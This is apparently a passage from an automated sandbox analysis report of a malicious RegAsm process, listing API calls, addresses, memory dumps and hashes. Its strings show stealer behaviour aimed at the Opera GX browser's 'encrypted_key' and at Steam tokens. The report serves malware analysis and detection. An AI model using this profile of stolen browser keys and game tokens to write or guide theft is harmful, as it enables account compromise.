                                                                                      • StrCmpCA.SHLWAPI(?,Opera GX,00436853,0043684B,?,?,?), ref: 0040C98F
                                                                                        • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                        • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                        • Part of subcall function 0040819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                      • String ID: Opera GX
                                                                                      • API String ID: 1719890681-3280151751
                                                                                      • Opcode ID: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                      • Instruction ID: 2f838092edd703084741f82f1e37e62fc4a331bb811b3281c0e98dae42c078f1
                                                                                      • Opcode Fuzzy Hash: 60c01dc8b37e4b84b74df1fa8103c1199fcfef80998ad79c597a27a207442b16
                                                                                      • Instruction Fuzzy Hash: 3FB1FD7294011DABCF10FFA6DE425CD7775AF04308F51013AF904771A1DBB8AE8A8B99
                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,?,?,?,00407C56,?), ref: 00407B8A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-3916222277
                                                                                      • Opcode ID: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                      • Instruction ID: 7cbd0eafb3405f1822ca0081af98c781be9845726f70e814ec0c9ffce599534c
                                                                                      • Opcode Fuzzy Hash: 12037c8daa12d7fcab0069a5037541411d8429e4b00213a69a2087787070dd30
                                                                                      • Instruction Fuzzy Hash: 14119D71908509ABDB20DF94C684BAAB3F4FB00348F144466D641E32C0D33CBE85D75B
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      • lstrlenA.KERNEL32(?), ref: 00416FFE
                                                                                        • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                        • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                      Strings
                                                                                      • Soft\Steam\steam_tokens.txt, xrefs: 0041700E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
                                                                                      • String ID: Soft\Steam\steam_tokens.txt
                                                                                      • API String ID: 502913869-3507145866
                                                                                      • Opcode ID: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                      • Instruction ID: 5852b7b14dd5e00f67c9332eee82213ee25541dc93f475b49d312086d811fdd4
                                                                                      • Opcode Fuzzy Hash: 212f9d999e26f76b20966994f13319e6fa11f2a26421251c526ef5ee57093a08
                                                                                      • Instruction Fuzzy Hash: A5012571E4010967CF00FBE6DD478CD7B74AF04358F514176FA0077152D779AA8A86D5
                                                                                      APIs
                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocLocal
                                                                                      • String ID: 1iA
                                                                                      • API String ID: 3494564517-1863120733
                                                                                      • Opcode ID: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                      • Instruction ID: dc66f3ebc75c526b8f29ca666c763a1a9938aadc44e5483d7dab6bcf02b3e8fe
                                                                                      • Opcode Fuzzy Hash: ab387d88e84e58f7ee09dd024291177f022f73d374550d18fdbda7562f7ae9e7
                                                                                      • Instruction Fuzzy Hash: 08E02B3AA41B201FC7724BAA8804AB7BB5A9FC2F61B18412BDF49CB324D535CC4182E4
                                                                                      APIs
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      • lstrlenA.KERNEL32(?), ref: 00409209
                                                                                      • lstrlenA.KERNEL32(?), ref: 00409224
                                                                                        • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                        • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                        • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                        • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                        • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                        • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 2500673778-0
                                                                                      • Opcode ID: 22752c67e7cf8aea0990da859bb6639e3ce1bf9e8e527a47f60de06b505466f8
                                                                                      • Instruction ID: 27ee426b6b58d638c78c42283a2d386f26495828f80e9e64967a6f8c5e3c9e1b
                                                                                      • Opcode Fuzzy Hash: 22752c67e7cf8aea0990da859bb6639e3ce1bf9e8e527a47f60de06b505466f8
                                                                                      • Instruction Fuzzy Hash: 49513D71A00119ABCF01FFA5EE468DD7775AF04309F50002AF500B71A2DBB8AE898B99
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000040,00000000,?,?,?,00407C18,?,?), ref: 0040784A
                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 4275171209-0
                                                                                      • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                      • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                      • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                      • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                      APIs
                                                                                      • malloc.MSVCRT ref: 0041CBC9
                                                                                        • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                        • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                        • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                      • malloc.MSVCRT ref: 0041CC06
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: malloc$lstrcpylstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2974738957-0
                                                                                      • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                      • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                                      • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                      • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                      • Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
                                                                                      • Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                      • Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                      • Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
                                                                                      • Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                      • Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                        • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FolderPathlstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1699248803-0
                                                                                      • Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                      • Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
                                                                                      • Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                      • Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                      • Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
                                                                                      • Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                      • Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8
                                                                                      APIs
                                                                                      • SHFileOperationA.SHELL32(?), ref: 00412577
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2449321753.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
